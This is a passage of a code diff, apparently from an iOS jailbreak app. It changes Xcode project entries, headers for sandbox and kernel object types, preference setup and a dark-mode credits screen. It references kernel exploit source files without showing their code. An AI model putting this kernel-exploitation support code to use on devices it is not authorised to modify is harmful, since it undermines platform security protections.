 		22F91CE221E033A500B2FCAE /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = libsnappy.c; path = snappy/libsnappy.c; sourceTree = SOURCE_ROOT; };
+		51435080229E2F0C00446FBA /* Settings-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Settings-Light.png"; sourceTree = "<group>"; };
+		51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "DarkMode-Dark.png"; sourceTree = "<group>"; };
+		51F1DB23229ED54400B81A6F /* Settings-Dark.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Settings-Dark.png"; sourceTree = "<group>"; };
+		51F1DB26229F2AD200B81A6F /* RobotoMono-Regular.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "RobotoMono-Regular.ttf"; sourceTree = "<group>"; };
+		51F1DB27229F2BC700B81A6F /* RobotoMono-Bold.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "RobotoMono-Bold.ttf"; sourceTree = "<group>"; };
+		51F1DB28229F31C400B81A6F /* DarkMode-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "DarkMode-Light.png"; sourceTree = "<group>"; };
+		51F1DB29229F31D300B81A6F /* DarkMode-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; name = "DarkMode-Light.png"; path = "../../../../DarkMode-Light.png"; sourceTree = "<group>"; };
+		51F1DB2A229F325700B81A6F /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
 		8D592A67218E47F60035D2BC /* Main.storyboard */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = file.storyboard; path = Main.storyboard; sourceTree = "<group>"; };
 /* End PBXFileReference section */

@@ -185,6 +211,7 @@
 			isa = PBXFrameworksBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				2163BE2122A1DB4700518DD9 /* libsandbox.tbd in Frameworks */,
 				21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */,
 				2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */,
 				216FDA1E220C5F5C0086D802 /* libz.tbd in Frameworks */,
@@ -303,6 +330,7 @@
 		21675B62214A68B700D20E2B /* Frameworks */ = {
 			isa = PBXGroup;
 			children = (
+				2163BE2022A1DB4700518DD9 /* libsandbox.tbd */,
 				21B4218F2261302F004C17CD /* MobileCoreServices.framework */,
 				2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */,
 				216FDA1D220C5F5C0086D802 /* libz.tbd */,
@@ -331,6 +359,8 @@
 		2170BD3421B192750059BD10 /* include */ = {
 			isa = PBXGroup;
 			children = (
+				2163BE1F22A1DB2400518DD9 /* sandbox.h */,
+				219BF90422832DBC00A4B827 /* UIProgressHUD.h */,
 				2150A9E322021381001C8677 /* mach_vm.h */,
 				2150A9E422021381001C8677 /* ipc_port.h */,
 				2150A9E52202138A001C8677 /* IOKitLib.h */,
@@ -351,6 +381,13 @@
 			isa = PBXGroup;
 			children = (
 				21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */,
+				51F1DB26229F2AD200B81A6F /* RobotoMono-Regular.ttf */,
+				51F1DB27229F2BC700B81A6F /* RobotoMono-Bold.ttf */,
+				51F1DB28229F31C400B81A6F /* DarkMode-Light.png */,
+				51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */,
+				51F1DB23229ED54400B81A6F /* Settings-Dark.png */,
+				51435080229E2F0C00446FBA /* Settings-Light.png */,
+				51F1DB29229F31D300B81A6F /* DarkMode-Light.png */,
 			);
 			path = resources;
 			sourceTree = "<group>";
@@ -358,6 +395,7 @@
 		2170BDCB21B32FF10059BD10 /* source */ = {
 			isa = PBXGroup;
 			children = (
+				2199B8E6226B40BD00A8255D /* kalloc_crash */,
 				214A1771224EBE4900588EC4 /* kerneldec */,
 				21FF63C8224E5FCE008B76D9 /* offset-cache */,
 				21FFE0F3222E4B1600EC59B2 /* machswap */,
@@ -379,8 +417,8 @@
 				21A97FC82148103B00DC0023 /* KernelExecution.m */,
 				21C0FC8021369EE900849420 /* KernelMemory.c */,
 				21C0FC8321369EE900849420 /* KernelMemory.h */,
-				21C0FC8221369EE900849420 /* KernelStructureOffsets.h */,
-				21C0FC8621369EE900849420 /* KernelStructureOffsets.m */,
+				21C0FC8221369EE900849420 /* KernelOffsets.h */,
+				21C0FC8621369EE900849420 /* KernelOffsets.m */,
 				21A97FC92148103B00DC0023 /* KernelUtilities.h */,
 				21A97FCC2148103B00DC0023 /* KernelUtilities.c */,
 				21C0FC7921369EB800849420 /* main.m */,
@@ -400,6 +438,12 @@
 				22C546AA21A8A8FD00EFC09C /* utils.m */,
 				222AD59421FA732A00DCBA2A /* FakeApt.h */,
 				222AD59221FA731800DCBA2A /* FakeApt.m */,
+				21CC3901227CDFDE0072D572 /* prefs.h */,
+				21CC3902227CDFDE0072D572 /* prefs.m */,
+				21CC3904227CDFDE0072D572 /* diagnostics.h */,
+				21CC3903227CDFDE0072D572 /* diagnostics.m */,
+				219C909E228703DA00AFA38A /* jailbreak.h */,
+				219C909F228703DA00AFA38A /* jailbreak.m */,
 			);
 			path = source;
 			sourceTree = "<group>";
@@ -412,6 +456,15 @@
 			path = frameworks;
 			sourceTree = "<group>";
 		};
+		2199B8E6226B40BD00A8255D /* kalloc_crash */ = {
+			isa = PBXGroup;
+			children = (
+				2199B8E7226B40C600A8255D /* kalloc_crash.h */,
+				2199B8E8226B40C600A8255D /* kalloc_crash.c */,
+			);
+			name = kalloc_crash;
+			sourceTree = "<group>";
+		};
 		21C0FC5E21369EB700849420 = {
 			isa = PBXGroup;
 			children = (
@@ -438,10 +491,10 @@
 				2170BD3621B192B90059BD10 /* resources */,
 				2170BD3421B192750059BD10 /* include */,
 				8D592A67218E47F60035D2BC /* Main.storyboard */,
+				51F1DB2A229F325700B81A6F /* multi_path.entitlements */,
 				21C0FC7321369EB800849420 /* Assets.xcassets */,
 				21C0FC7521369EB800849420 /* LaunchScreen.storyboard */,
 				21C0FC7821369EB800849420 /* Info.plist */,
-				21C1312E214D5A710021AA9D /* multi_path.entitlements */,
 			);
 			path = Undecimus;
 			sourceTree = "<group>";
@@ -554,7 +607,10 @@
 			isa = PBXResourcesBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				51F1DB25229ED54400B81A6F /* Settings-Dark.png in Resources */,
+				51435081229E2F0C00446FBA /* Settings-Light.png in Resources */,
 				21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */,
+				51F1DB24229ED54400B81A6F /* DarkMode-Dark.png in Resources */,
 				8D592A68218E47F60035D2BC /* Main.storyboard in Resources */,
 				21C0FC7421369EB800849420 /* Assets.xcassets in Resources */,
 			);
@@ -605,16 +661,20 @@
 				2150A9DE22021348001C8677 /* platform.c in Sources */,
 				213E7828220865A100FDF3B7 /* voucher_swap-poc.c in Sources */,
 				22F91CDB21E02CF300B2FCAE /* inject.m in Sources */,
+				2199B8E9226B40C600A8255D /* kalloc_crash.c in Sources */,
 				21C1312F214E69F80021AA9D /* empty_list_sploit.c in Sources */,
 				21C0FC8721369EE900849420 /* KernelMemory.c in Sources */,
+				21CC3906227CDFDE0072D572 /* diagnostics.m in Sources */,
 				21C0FC7A21369EB800849420 /* main.m in Sources */,
 				212D8847216E4DF600A36DA5 /* early_kalloc.c in Sources */,
+				21CC3905227CDFDE0072D572 /* prefs.m in Sources */,
 				21A97FD02148103C00DC0023 /* remote_memory.c in Sources */,
 				222AD59321FA731800DCBA2A /* FakeApt.m in Sources */,
 				21FF63CB224E5FDC008B76D9 /* offsetcache.c in Sources */,
 				216F3F3F2228776E007DC1BC /* pac.c in Sources */,
 				21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */,
-				21C0FC8A21369EE900849420 /* KernelStructureOffsets.m in Sources */,
+				219C90A0228703DA00AFA38A /* jailbreak.m in Sources */,
+				21C0FC8A21369EE900849420 /* KernelOffsets.m in Sources */,
 				21FFE0F9222E4C0600EC59B2 /* machswap_pwn.m in Sources */,
 				21FFE0F8222E4C0600EC59B2 /* machswap_offsets.m in Sources */,
 				212D884A216E4EBF00A36DA5 /* async_wake.c in Sources */,
@@ -0,0 +1,33 @@
+#import <UIKit/UIKit.h>
+
+@class UIProgressIndicator, UILabel, UIImageView, UIWindow;
+
+@interface UIProgressHUD : UIView {
+
+	UIProgressIndicator* _progressIndicator;
+	UILabel* _progressMessage;
+	UIImageView* _doneView;
+	UIWindow* _parentWindow;
+	struct {
+		unsigned isShowing : 1;
+		unsigned isShowingText : 1;
+		unsigned fixedFrame : 1;
+		unsigned reserved : 30;
+	}  _progressHUDFlags;
+
+}
+-(id)initWithFrame:(CGRect)arg1 ;
+-(void)layoutSubviews;
+-(void)hide;
+-(void)show:(bool)arg1 ;
+-(void)drawRect:(CGRect)arg1 ;
+-(void)dealloc;
+-(void)setText:(id)arg1 ;
+-(id)initWithWindow:(id)arg1 ;
+-(void)done;
+-(void)setFontSize:(int)arg1 ;
+-(id)_progressIndicator;
+-(void)setShowsText:(bool)arg1 ;
+-(void)showInView:(id)arg1 ;
+@end
+
@@ -4,29 +4,55 @@
 #include <stdint.h>             // uint*_t
 #include <stdbool.h>
 #include <mach-o/loader.h>
+#include <mach/error.h>
 #ifdef __OBJC__
 #include <Foundation/Foundation.h>
-#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(false)
+#define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false)
+#define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val]
 #else
 #include <CoreFoundation/CoreFoundation.h>
 extern void NSLog(CFStringRef, ...);
-#define LOG(str, args...) do { NSLog(CFSTR("[*] " str "\n"), ##args); } while(false)
+#define RAWLOG(str, args...) do { NSLog(CFSTR(str), ##args); } while(false)
+#define BOOL bool
+#define YES ((BOOL) true)
+#define NO ((BOOL) false)
 #endif

-extern uint64_t offset_options;
-#define OPT(x) (offset_options?((rk64(offset_options) & OPT_ ##x)?true:false):false)
-#define SETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) | OPT_ ##x):0)
-#define UNSETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) & ~OPT_ ##x):0)
-#define OPT_GET_TASK_ALLOW (1<<0)
-#define OPT_CS_DEBUGGED (1<<1)
+#define LOG(str, args...) RAWLOG("[*] " str, ##args)
+
+#define SafeFree(x) do { if (x) free(x); } while(false)
+#define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while(false)
+#define CFSafeRelease(x) do { if (x) CFRelease(x); } while(false)
+#define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
+#define SafeSFree(x) do { if (KERN_POINTER_VALID(x)) sfree(x); } while(false)
+#define SafeSFreeNULL(x) do { SafeSFree(x); (x) = KPTR_NULL; } while(false)
+#define SafeIOFree(x, size) do { if (KERN_POINTER_VALID(x)) IOFree(x, size); } while(false)
+#define SafeIOFreeNULL(x, size) do { SafeIOFree(x, size); (x) = KPTR_NULL; } while(false)
+
+#define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
+#define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23
+#define kCFCoreFoundationVersionNumber_iOS_11_0 1443.00
+
+#define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)

 #define ADDR                 "0x%016llx"
 #define MACH_HEADER_MAGIC    MH_MAGIC_64
 #define MACH_LC_SEGMENT      LC_SEGMENT_64
 typedef struct mach_header_64 mach_hdr_t;
 typedef struct segment_command_64 mach_seg_t;
-typedef uint64_t kptr_t;
 typedef struct load_command mach_lc_t;
+typedef uint64_t kptr_t;
+#define KPTR_NULL ((kptr_t) 0)
+#define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff)
+#define MAX_KASLR_SLIDE 0x21000000
+#define STATIC_KERNEL_BASE_ADDRESS 0xfffffff007004000
+
+extern kptr_t offset_options;
+#define OPT(x) (offset_options?((rk64(offset_options) & OPT_ ##x)?true:false):false)
+#define SETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) | OPT_ ##x):0)
+#define UNSETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) & ~OPT_ ##x):0)
+#define OPT_GET_TASK_ALLOW (1<<0)
+#define OPT_CS_DEBUGGED (1<<1)

 #endif

@@ -15,8 +15,52 @@ typedef io_object_t io_connect_t;
 typedef io_object_t io_iterator_t;

 #define IO_OBJECT_NULL  (0)
+
 #define kIONVRAMForceSyncNowPropertyKey        "IONVRAM-FORCESYNCNOW-PROPERTY"

+#define IO_BITS_PORT_INFO   0x0000f000
+#define IO_BITS_KOTYPE      0x00000fff
+#define IO_BITS_OTYPE       0x7fff0000
+#define IO_BITS_ACTIVE      0x80000000
+
+#define IKOT_NONE               0
+#define IKOT_THREAD             1
+#define IKOT_TASK               2
+#define IKOT_HOST               3
+#define IKOT_HOST_PRIV          4
+#define IKOT_PROCESSOR          5
+#define IKOT_PSET               6
+#define IKOT_PSET_NAME          7
+#define IKOT_TIMER              8
+#define IKOT_PAGING_REQUEST     9
+#define IKOT_MIG                10
+#define IKOT_MEMORY_OBJECT      11
+#define IKOT_XMM_PAGER          12
+#define IKOT_XMM_KERNEL         13
+#define IKOT_XMM_REPLY          14
+#define IKOT_UND_REPLY          15
+#define IKOT_HOST_NOTIFY        16
+#define IKOT_HOST_SECURITY      17
+#define IKOT_LEDGER             18
+#define IKOT_MASTER_DEVICE      19
+#define IKOT_TASK_NAME          20
+#define IKOT_SUBSYSTEM          21
+#define IKOT_IO_DONE_QUEUE      22
+#define IKOT_SEMAPHORE          23
+#define IKOT_LOCK_SET           24
+#define IKOT_CLOCK              25
+#define IKOT_CLOCK_CTRL         26
+#define IKOT_IOKIT_SPARE        27
+#define IKOT_NAMED_ENTRY        28
+#define IKOT_IOKIT_CONNECT      29
+#define IKOT_IOKIT_OBJECT       30
+#define IKOT_UPL                31
+#define IKOT_MEM_OBJ_CONTROL    32
+#define IKOT_AU_SESSIONPORT     33
+#define IKOT_FILEPORT           34
+#define IKOT_LABELH             35
+#define IKOT_TASK_RESUME        36
+
 enum
 {
    kIOCFSerializeToBinary          = 0x00000001U,
@@ -0,0 +1,181 @@
+/*
+ * Copyright (c) 2006-2010 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ * 
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ * 
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ * 
+ * @APPLE_LICENSE_HEADER_END@
+ */
+#ifndef _SANDBOX_H_
+#define _SANDBOX_H_
+
+#include <sys/cdefs.h>
+#include <stdint.h>
+#include <unistd.h>
+
+__BEGIN_DECLS
+/*
+ * @function sandbox_init
+ * Places the current process in a sandbox with a profile as
+ * specified.  If the process is already in a sandbox, the new profile
+ * is ignored and sandbox_init() returns an error.
+ *
+ * @param profile (input)   The Sandbox profile to be used.  The format
+ * and meaning of this parameter is modified by the `flags' parameter.
+ *
+ * @param flags (input)   Must be SANDBOX_NAMED.  All other
+ * values are reserved.
+ *
+ * @param errorbuf (output)   In the event of an error, sandbox_init
+ * will set `*errorbuf' to a pointer to a NUL-terminated string
+ * describing the error. This string may contain embedded newlines.
+ * This error information is suitable for developers and is not
+ * intended for end users.
+ *
+ * If there are no errors, `*errorbuf' will be set to NULL.  The
+ * buffer `*errorbuf' should be deallocated with `sandbox_free_error'.
+ *
+ * @result 0 on success, -1 otherwise.
+ */
+int sandbox_init(const char *profile, uint64_t flags, char **errorbuf);
+
+/*
+ * @define SANDBOX_NAMED  The `profile' argument specifies a Sandbox
+ * profile named by one of the kSBXProfile* string constants.
+ */
+#define SANDBOX_NAMED		0x0001
+
+#ifdef __APPLE_API_PRIVATE
+
+/* The following flags are reserved for Mac OS X.  Developers should not
+ * depend on their availability.
+ */
+
+/*
+ * @define SANDBOX_NAMED_BUILTIN   The `profile' argument specifies the
+ * name of a builtin profile that is statically compiled into the
+ * system.
+ */
+#define SANDBOX_NAMED_BUILTIN	0x0002
+
+/*
+ * @define SANDBOX_NAMED_EXTERNAL   The `profile' argument specifies the
+ * pathname of a Sandbox profile.  The pathname may be abbreviated: If
+ * the name does not start with a `/' it is treated as relative to
+ * /usr/share/sandbox and a `.sb' suffix is appended.
+ */
+#define SANDBOX_NAMED_EXTERNAL	0x0003
+
+/*
+ * @define SANDBOX_NAMED_MASK   Mask for name types: 4 bits, 15 possible
+ * name types, 3 currently defined.
+ */
+#define SANDBOX_NAMED_MASK	0x000f
+
+#endif /* __APPLE_API_PRIVATE */
+
+/*
+ * Available Sandbox profiles.
+ */
+
+/* TCP/IP networking is prohibited. */
+extern const char kSBXProfileNoInternet[];
+
+/* All sockets-based networking is prohibited. */
+extern const char kSBXProfileNoNetwork[];
+
+/* File system writes are prohibited. */
+extern const char kSBXProfileNoWrite[];
+
+/* File system writes are restricted to temporary folders /var/tmp and
+ * confstr(_CS_DARWIN_USER_DIR, ...).
+ */
+extern const char kSBXProfileNoWriteExceptTemporary[];
+
+/* All operating system services are prohibited. */
+extern const char kSBXProfilePureComputation[];
+
+/*
+ * @function sandbox_free_error
+ * Deallocates an error string previously allocated by sandbox_init.
+ *
+ * @param errorbuf (input)   The buffer to be freed.  Must be a pointer
+ * previously returned by sandbox_init in the `errorbuf' argument, or NULL.
+ *
+ * @result void
+ */
+void sandbox_free_error(char *errorbuf);
+
+
+#ifdef __APPLE_API_PRIVATE
+
+/* The following definitions are reserved for Mac OS X.  Developers should not
+ * depend on their availability.
+ */
+
+int sandbox_init_with_parameters(const char *profile, uint64_t flags, const char *const parameters[], char **errorbuf);
+
+int sandbox_init_with_extensions(const char *profile, uint64_t flags, const char *const extensions[], char **errorbuf);
+
+enum sandbox_filter_type {
+	SANDBOX_FILTER_NONE,
+	SANDBOX_FILTER_PATH,
+	SANDBOX_FILTER_GLOBAL_NAME,
+	SANDBOX_FILTER_LOCAL_NAME,
+	SANDBOX_FILTER_APPLEEVENT_DESTINATION,
+	SANDBOX_FILTER_RIGHT_NAME,
+};
+
+extern const enum sandbox_filter_type SANDBOX_CHECK_NO_REPORT __attribute__((weak_import));
+
+enum sandbox_extension_flags {
+	FS_EXT_DEFAULTS =              0,
+	FS_EXT_FOR_PATH =       (1 << 0),
+	FS_EXT_FOR_FILE =       (1 << 1),
+	FS_EXT_READ =           (1 << 2),
+	FS_EXT_WRITE =          (1 << 3),
+	FS_EXT_PREFER_FILEID =  (1 << 4),
+};
+
+int sandbox_check(pid_t pid, const char *operation, enum sandbox_filter_type type, ...);
+
+int sandbox_note(const char *note);
+
+int sandbox_suspend(pid_t pid);
+int sandbox_unsuspend(void);
+
+int sandbox_issue_extension(const char *path, char **ext_token);
+int sandbox_issue_fs_extension(const char *path, uint64_t flags, char **ext_token);
+int sandbox_issue_fs_rw_extension(const char *path, char **ext_token);
+int sandbox_issue_mach_extension(const char *name, char **ext_token);
+
+int sandbox_consume_extension(const char *path, const char *ext_token);
+int sandbox_consume_fs_extension(const char *ext_token, char **path);
+int sandbox_consume_mach_extension(const char *ext_token, char **name);
+
+int sandbox_release_fs_extension(const char *ext_token);
+
+int sandbox_container_path_for_pid(pid_t pid, char *buffer, size_t bufsize);
+
+int sandbox_wakeup_daemon(char **errorbuf);
+
+const char *_amkrtemp(const char *);
+
+#endif /* __APPLE_API_PRIVATE */
+
+__END_DECLS
+#endif /* _SANDBOX_H_ */
@@ -11,6 +11,7 @@
 #include "JailbreakViewController.h"
 #include "SettingsTableViewController.h"
 #include "utils.h"
+#include "prefs.h"

@interface AppDelegate ()

@@ -83,95 +84,8 @@


 - (void)initPrefs {
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_TWEAK_INJECTION] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_TWEAK_INJECTION];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_LOAD_DAEMONS] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_LOAD_DAEMONS];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DUMP_APTICKET] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DUMP_APTICKET];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_REFRESH_ICON_CACHE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_REFRESH_ICON_CACHE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setObject:@"0x1111111111111111" forKey:K_BOOT_NONCE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPLOIT] != nil &&
-        !supportsExploit((exploit_t)[[NSUserDefaults standardUserDefaults] integerForKey:K_EXPLOIT])) {
-        [[NSUserDefaults standardUserDefaults] removeObjectForKey:K_EXPLOIT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPLOIT] == nil) {
-        [[NSUserDefaults standardUserDefaults] setInteger:recommendedJailbreakSupport() forKey:K_EXPLOIT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DISABLE_AUTO_UPDATES] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DISABLE_AUTO_UPDATES];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_DISABLE_APP_REVOKES] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_DISABLE_APP_REVOKES];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_OVERWRITE_BOOT_NONCE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_OVERWRITE_BOOT_NONCE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_EXPORT_KERNEL_TASK_PORT] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_EXPORT_KERNEL_TASK_PORT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RESTORE_ROOTFS] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_RESTORE_ROOTFS];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INCREASE_MEMORY_LIMIT] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INCREASE_MEMORY_LIMIT];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] == nil) {
-        [[NSUserDefaults standardUserDefaults] setObject:@"0x0" forKey:K_ECID];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INSTALL_CYDIA] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INSTALL_CYDIA];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_INSTALL_OPENSSH] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_INSTALL_OPENSSH];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RELOAD_SYSTEM_DAEMONS] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:YES forKey:K_RELOAD_SYSTEM_DAEMONS];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_HIDE_LOG_WINDOW] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_HIDE_LOG_WINDOW];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_RESET_CYDIA_CACHE] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_RESET_CYDIA_CACHE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_SSH_ONLY] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_SSH_ONLY];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_ENABLE_GET_TASK_ALLOW] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_ENABLE_GET_TASK_ALLOW];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
-    if ([[NSUserDefaults standardUserDefaults] objectForKey:K_SET_CS_DEBUGGED] == nil) {
-        [[NSUserDefaults standardUserDefaults] setBool:NO forKey:K_SET_CS_DEBUGGED];
-        [[NSUserDefaults standardUserDefaults] synchronize];
-    }
+    register_default_prefs();
+    repair_prefs();
 }

 - (void)initShortcuts {
@@ -12,4 +12,32 @@

 + (NSURL *)getURLForUserName:(NSString *)userName;

+@property (weak, nonatomic) IBOutlet UIButton *ianBeerButton;
+@property (weak, nonatomic) IBOutlet UIButton *bazadButton;
+@property (weak, nonatomic) IBOutlet UIButton *morpheusButton;
+@property (weak, nonatomic) IBOutlet UIButton *xerubButton;
+@property (weak, nonatomic) IBOutlet UIButton *psychoTeaButton;
+@property (weak, nonatomic) IBOutlet UIButton *stekButton;
+@property (weak, nonatomic) IBOutlet UIButton *ninjaPrawnButton;
+@property (weak, nonatomic) IBOutlet UIButton *crypticButton;
+@property (weak, nonatomic) IBOutlet UIButton *xerusDesignButton;
+@property (weak, nonatomic) IBOutlet UIButton *appleDryButton;
+@property (weak, nonatomic) IBOutlet UIButton *robButton;
+@property (weak, nonatomic) IBOutlet UIButton *midnightChipButton;
+@property (weak, nonatomic) IBOutlet UIButton *geoSn0wButton;
+@property (weak, nonatomic) IBOutlet UIButton *swaggoButton;
+@property (weak, nonatomic) IBOutlet UIButton *jailbreakbusterButton;
+@property (weak, nonatomic) IBOutlet UIButton *jakeashacksButton;
+@property (weak, nonatomic) IBOutlet UIButton *saurikButton;
+@property (weak, nonatomic) IBOutlet UIButton *siguzaButton;
+@property (weak, nonatomic) IBOutlet UIButton *externalistButton;
+@property (weak, nonatomic) IBOutlet UIButton *realBrightiupButton;
+@property (weak, nonatomic) IBOutlet UIButton *nitoTVButton;
+@property (weak, nonatomic) IBOutlet UIButton *matchsticButton;
+@property (weak, nonatomic) IBOutlet UIButton *umanghereButton;
+@property (weak, nonatomic) IBOutlet UIButton *miscMistyButton;
+@property (weak, nonatomic) IBOutlet UIButton *benButton;
+@property (weak, nonatomic) IBOutlet UIButton *samGButton;
+@property (weak, nonatomic) IBOutlet UIButton *dennisButton;
+
@end
@@ -16,15 +16,8 @@

 - (void)viewDidLoad {
    [super viewDidLoad];
-    UIImageView *myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
-    [myImageView setContentMode:UIViewContentModeScaleAspectFill];
-    [myImageView setFrame:self.tableView.frame];
-    UIView *myView = [[UIView alloc] initWithFrame:myImageView.frame];
-    [myView setBackgroundColor:[UIColor whiteColor]];
-    [myView setAlpha:0.84];
-    [myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
-    [myImageView addSubview:myView];
-    [self.tableView setBackgroundView:myImageView];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(darkModeCreditsView:) name:@"darkModeCredits" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(lightModeCreditsView:) name:@"lightModeCredits" object:nil];
 }

 - (void)didReceiveMemoryWarning {
@@ -32,6 +25,68 @@
    // Dispose of any resources that can be recreated.
 }

+-(void) darkModeCreditsView:(NSNotification *) notification  {
+    
+    [self.ianBeerButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.bazadButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.morpheusButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.xerubButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.psychoTeaButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.stekButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.ninjaPrawnButton setTitleColor:[UIColor whiteColor] forState:normal];
